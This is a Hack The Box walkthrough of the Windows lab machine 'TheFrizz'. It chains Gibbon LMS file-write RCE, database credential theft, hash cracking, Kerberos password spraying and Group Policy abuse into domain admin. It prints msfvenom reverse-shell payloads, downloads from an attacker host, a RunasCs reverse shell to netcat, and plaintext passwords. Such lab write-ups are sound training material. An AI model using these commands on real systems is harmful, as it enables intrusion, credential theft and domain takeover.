HTB | TheFrizz
This is a Windows box. You can find it here
IP - 10.10.11.60
Nmap
└─$ nmap -sT -p- --min-rate 10000 10.10.11.60 -Pn -oA nmap_ports
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2025-05-07 14:39 IST
Nmap scan report for 10.10.11.60
Host is up (0.25s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
9389/tcp open adws
49664/tcp open unknown
49668/tcp open unknown
49670/tcp open unknown
56383/tcp open unknown
56387/tcp open unknown
56397/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 54.76 seconds└─$ nmap -sC -sV -p 22,53,80,88,135,139,389,445,464,593,636,3268,3269,9389,49664,49668,49670,56383,56387,56397 10.10.11.60 -Pn -oA nmap_ports_details
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2025-05-07 14:41 IST
Nmap scan report for 10.10.11.60
Host is up (0.25s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_9.5 (protocol 2.0)
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-title: Did not follow redirect to <http://frizzdc.frizz.htb/home/>
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-07 16:11:56Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
56383/tcp open msrpc Microsoft Windows RPC
56387/tcp open msrpc Microsoft Windows RPC
56397/tcp open msrpc Microsoft Windows RPC
Service Info: Hosts: localhost, FRIZZDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-05-07T16:12:51
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 7h00m02s
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 108.22 seconds
Port 80
Let’s add frizzdc.frizz.htb to hosts file
└─$ sudo echo "10.10.11.60 frizzdc.frizz.htb" | sudo tee -a /etc/hosts
[sudo] password for anurag:
10.10.11.60 frizzdc.frizz.htbwebsite
going through the website, we found the Gibbon LMS staff login page http://frizzdc.frizz.htb/Gibbon-LMS/
Foothold/shell
CVE-2023-34598
We have found a **CVE-2023-34598** on the advisory page, and according to that Gibbon v25.0.0 is vulnerable to a Local File Inclusion
We have found a POC on MaddSec GitHub, and according to that
In order to exploit the vulnerability, an attacker would need to manipulate the "q" parameter to query a local file. This manipulation would cause the file to be included in the server's response. However, it's important to note that this exploit is only effective for files located within the installation folder and under specific conditions, which exclude PHP files, for instance.
Let’s try to exploit this, and for that, we will try gibbon.sql
There was no interesting information in there.
CVE-2023-45878
On looking for other exploits, we found CVE-2023-45878 and this GitHub exploit
GibbonEdu Gibbon version 25.0.1 and before allows Arbitrary File Write because rubrics_visualise_saveAjax.phps does not require authentication. The endpoint accepts the img, path, and gibbonPersonID parameters. The img parameter is expected to be a base64 encoded image. If the path parameter is set, the defined path is used as the destination folder, concatenated with the absolute path of the installation directory. The content of the img parameter is base64 decoded and written to the defined file path. This allows creation of PHP files that permit Remote Code Execution (unauthenticated).
Let’s clone the repo and try to exploit CVE-2023-45878
and we are able to run commands on the shell
shell as w.webservice
Now let’s try to get shell
We found the database credentials in config.php
MySql
We have found mysql.exe and we have the credentials. Let’s try to enumerate databases.
PS C:\\xampp\\mysql\\bin> .\\mysql.exe -u <USERNAME> -p"<Password>" -e "show databases;"
Database
gibbon
information_schema
testlist tables in gibbon
PS C:\\xampp\\mysql\\bin> .\\mysql.exe -u <USERNAME> -p"<Password>" -e "show tables;" gibbon
Tables_in_gibbon
gibbonaction
gibbonactivity
gibbonactivityattendance
gibbonactivityslot
<--SNIP-->
gibbonperson
<--SNIP-->
gibbonunitclassblock
gibbonunitoutcome
gibbonusernameformat
gibbonyeargroupDisplay table Gibbonperson
PS C:\\xampp\\mysql\\bin> .\\mysql.exe -u MrGibbonsDB -p"MisterGibbs!Parrot!?1" -e "use gibbon; SELECT * from gibbonperson;" -E
*************************** 1. row ***************************
gibbonPersonID: 0000000001
title: Ms.
surname: Frizzle
firstName: Fiona
preferredName: Fiona
officialName: Fiona Frizzle
nameInCharacters:
gender: Unspecified
username: f.frizzle
passwordStrong: <PASSOWRD>
passwordStrongSalt: /<salt>
passwordForceReset: N
status: Full
canLogin: Y
gibbonRoleIDPrimary: 001
gibbonRoleIDAll: 001
dob: NULL
email: f.frizzle@frizz.htb
emailAlternate: NULL
image_240: NULL
lastIPAddress: ::1
lastTimestamp: 2024-10-29 09:28:59
lastFailIPAddress: NULL
lastFailTimestamp: NULL
failCount: 0We have found salt and an encrypted password for Fiona Frizzle
shell as f.frizzle
The password looks like a SHA-256 hash, which GibbonCMS uses by default:
hash('sha256', $salt . $password)So the logic is:
HASH = sha256(salt + password)cracking password
We need to convert the hash and salt to a format that Hashcat understands.
Hash function: SHA256(salt + password)
Hashcat mode: 1420 → sha256($salt.$pass)
//format
<hash>:/<salt>Let’s create a file (e.g., gibbon.hash) with this and run it with rockyou.txt
└─$ hashcat -m 1420 -a 0 f.frizzle.hash /home/anurag/stuff/rockyou.txtAnd we have cracked the password
shell via tgt
not able to validate credentials via netexex smb and evil-winrm
I have checked that the user exists (maybe the password was old?)
I can confirm the credentials using Kerbrute
└─$ sudo ntpdate 10.10.11.60
└─$ ./kerbrute bruteuser --dc 10.10.11.60 -d frizz.htb pass.txt f.frizzle -v
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \\/ ___/ __ \\/ ___/ / / / __/ _ \\
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\\___/_/ /_.___/_/ \\__,_/\\__/\\___/
Version: v1.0.3 (9dad6e1) - 05/08/25 - Ronnie Flathers @ropnop
2025/05/08 01:30:42 > Using KDC(s):
2025/05/08 01:30:42 > 10.10.11.60:88
2025/05/08 01:30:43 > [+] VALID LOGIN: f.frizzle@frizz.htb:<PASSOWRD>
2025/05/08 01:30:43 > Done! Tested 1 logins (1 successes) in 0.555 seconds
So that means the credential is correct.
Since we have the valid credentials, we can forge a ticket and login via that ticket
└─$ impacket-getTGT frizz.htb/'f.frizzle':'<PASSWORD>' -dc-ip 10.10.11.60
└─$ export KRB5CCNAME=f.frizzle.ccache
└─$ klist
└─$ evil-winrm -i frizzdc.frizz.htb -k f.frizzle.ccache -r frizz.htb Only put the above in the config file and SSH
ssh f.frizzle@frizz.htb -K
And we found user.txt
Privilege Escalation
Bloodhound
Since we have valid credentials, we can use BloodHound to collect data and analyse further
└─$ bloodhound-python -u 'f.frizzle' -p 'Jenni_Luvs_Magic23' -d frizz.htb -dc frizzdc.frizz.htb -ns 10.10.11.60 -c all --zip
After checking privilege for all the user we found m.schoolbus have a lot of privileges
shell as w.schoolbus
Nothing interesting was found via Winpeas and powerup
Let’s look for hidden files
PS C:\\> ls -forcewe found some zip files
I tried many ways to copy, but none of them worked, in the end, I had to use Meterpreter.
Make a reverse TCP payload via msfvenom
Copy it to the Windows box
Start Meterpreter handler and execute that payload
Once we have Meterpreter shell, we can copy the file
└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.4 LPORT=1234 -f exe -o payload.exePS C:\\$RECYCLE.BIN\\S-1-5-21-2386970044-1145388522-2932701813-1103> Invoke-WebRequest -Uri "<http://10.10.16.4/payload.exe>" -outfile "payload.exe"use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST tune0
set LPORT 1234
runmeterpreter > download $IE2XMEG.7z
meterpreter > download $RE2XMEG.7z I was able to extract $RE2XMEG.7z
found some credentials
└─$ grep -ri "password" wapt/conf 
It was base64 encrypted so I could decrypt and get the clear text password
Let’s use Kerbrute to find the correct user name.
But first let’s get the list of username
PS C:\\Users\\f.frizzle> Get-ADUser -Filter * -Properties * | select name
name
----
Administrator
Guest
krbtgt
f.frizzle
w.li
h.arm
M.SchoolBus
d.hudson
k.franklin
l.awesome
t.wright
r.tennelli
J.perlstein
a.perlstein
p.terese
v.frizzle
g.frizzle
c.sandiego
c.ramon
m.ramon
w.Webservice
Now we can copy the list to users.txt and perform passwordspary is Kerbrute
└─$ ./kerbrute passwordspray -d frizz.htb --dc 10.10.11.60 users.txt '<PASSWORD>' -vwe found a match M.schoolbus
Let’s perform the same tgt stuff we did for f.frizzle
└─$ kinit M.SchoolBus@FRIZZ.HTB
└─$ klist
└─$ ssh M.SchoolBus@10.10.11.60 -K
Administrator privilege
From the whoami /groups output, we know we are frizz\\Group Policy Creator Owners
This means we do have permission to create Group Policy Objects (GPOs) in the domain.
By default, members of the Group Policy Creator Owners can:
Create new GPOs
Edit or delete GPOs they created
GPO Abuse
Now we have to use SharpGPOAbuse to add us to the administrator group, and for that, we need to
Create a GPO named pain.
Link it to the DOMAIN CONTROLLERS organizational unit in the FRIZZ.HTB domain.
Make sure the link is enabled so that the GPO takes effect on all objects within the OU (ie, domain controllers).
PS C:\\Users\\M.SchoolBus> New-GPO -Name "TestGPO" | New-GPLink -Target "OU=DOMAIN CONTROLLERS,DC=FRIZZ,DC=HTB" -LinkEnabled Yes
GpoId : 416eb50f-4fda-41e6-9475-c7a9bedb6f07
DisplayName : TestGPO
Enabled : True
Enforced : False
Target : OU=Domain Controllers,DC=frizz,DC=htb
Order : 2
PS C:\\Users\\M.SchoolBus>
Now we have to download SharpGPOAbuse and execute it
PS C:\\Users\\M.SchoolBus> Invoke-WebRequest -uri "<http://10.10.16.7/SharpGPOAbuse.exe>" -outfile SharpGPOAbuse.exe
PS C:\\Users\\M.SchoolBus> .\\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount M.SchoolBus --GPOName TestGPO
[+] Domain = frizz.htb
[+] Domain Controller = frizzdc.frizz.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=frizz,DC=htb
[+] SID Value of M.SchoolBus = S-1-5-21-2386970044-1145388522-2932701813-1106
[+] GUID of "TestGPO" is: {6A50C9A1-E986-42CF-BAB1-B96C4557E011}
[+] Creating file \\\\frizz.htb\\SysVol\\frizz.htb\\Policies\\{6A50C9A1-E986-42CF-BAB1-B96C4557E011}\\Machine\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!
PS C:\\Users\\M.SchoolBus> gpupdate /force
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.
PS C:\\Users\\M.SchoolBus>
Now, ideally, we need to logoff and login again for this to take effect, but in our case (since we are on HTB and it has multiple instances), we cannot do that
So we will use RunasCs because we are getting a permission denied when trying runas
RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credentials. This tool is an improved and open version of windows builtin runas.exe
//on Windwos box
PS C:\\Users\\M.SchoolBus> Invoke-WebRequest -uri "<http://10.10.16.7/RunasCs.exe>" -OutFile RunasCs.exe
PS C:\\Users\\M.SchoolBus> .\\RunasCs.exe M.SchoolBus <PASSWORD> cmd.exe -r 10.10.16.7:1234
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\\Desktop: Service-0x0-bd6f6$\\Default
[+] Async process 'C:\\Windows\\system32\\cmd.exe' with pid 2724 created in background.
PS C:\\Users\\M.SchoolBus>
//on our machine
└─$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.60] 63289
Microsoft Windows [Version 10.0.20348.3207]
(c) Microsoft Corporation. All rights reserved.
C:\\Windows\\system32>whoami
whoami
frizz\\m.schoolbus
C:\\Windows\\system32>cd C:\\Users\\Administrator\\Desktop
cd C:\\Users\\Administrator\\Desktop
C:\\Users\\Administrator\\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is D129-C3DA
Directory of C:\\Users\\Administrator\\Desktop
03/11/2025 04:14 PM <DIR> .
03/11/2025 03:37 PM <DIR> ..
02/25/2025 03:06 PM 2,083 cleanup.ps1
05/11/2025 08:42 AM 34 root.txt
2 File(s) 2,117 bytes
2 Dir(s) 2,085,539,840 bytes free
C:\\Users\\Administrator\\Desktop>And we have root.txt
Last updated